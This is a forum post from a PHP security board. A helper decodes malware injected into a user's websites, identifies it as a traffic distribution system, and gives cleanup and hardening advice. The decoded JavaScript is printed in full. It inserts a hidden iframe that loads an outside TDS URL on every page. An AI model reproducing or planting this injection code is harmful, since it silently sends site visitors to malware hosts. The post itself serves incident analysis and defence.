Malware script attacked my sites

Security issues related to php and mysql usage. How to make your code secure? Security measures and configurations? It's all in here!

Moderators: egami, macek, gesf

Post Reply
TheProdigyGuy
New php-forum User
New php-forum User
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm

Sun Feb 19, 2012 11:42 am

Ok let me to decode it for you:

Code: Select all

 //eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://tds36.4mydomain.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}  //document.write (s)  <iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function  //jsunpack.url var q = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function  //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function  
It is TDS!

http://www.symantec.com/connect/blogs/w ... on-systems

http://sucuri.net/malware/malware-entry-mwiframeenc1560


And finally here is author of this *pack*
http://www.simpletds.com/manual-install


Analysing h***://tds36.4mydomain.com domain theris no route to host.
So,Seems you computer infected with TDS which is unable to update itself and it still inject outdated payload tds36.4mydomain.com .



Here is few things for you:
1) Your computer infected (Rootkit,tro,virii,spyware etc.)
Using this way when you are going to connect to FTP server of your site on fly It injects its "payload" to memory (finally it injects that obfuscated javascript payload to your scripts) and spreads it self + infects your sites)
So,make sure your computer clean,Keep up2date your software,Check for rootkits(In eg: Unhackme)
Use antiviriies,Firewalls,Launch your browser from Sandboxie and so on.


2) This is possible your site is vulnerable(LFI,RFI,SQLI etc)
using that way skriptkiddiez pwn'd your site then infected it (For BOTNET)

3) This is possible your hosting company is not correctly administering(And it is vulnerable to different attacks)
In eg:Outdated software which has a lot of 0days

You need investigate how it appears:
1) You need to analize your site logs(*.tar.gz,*.tar)
It is a complex thing and requires knoledge (especially with Linux)


Anyway,Clean your computer,use software from official sites.
Update your web software,change your mysql,ftp,ssh,cpanel,emails,secret questions,passwords and use unique+random password.
A)Login to your cpanel (after cleanup) then investigate do you have any additional (backdoor) ftp accounts?
B) Look to cron jobs(i see a lot of cron based backdoors)

After clean up of your computer
Download full backup of your site then scan it from antiviruses(IMHO Avira Antivir is best way to do it)

Good Luck)

Post Reply
  • Information
  • Who is online

    Users browsing this forum: No registered users and 1 guest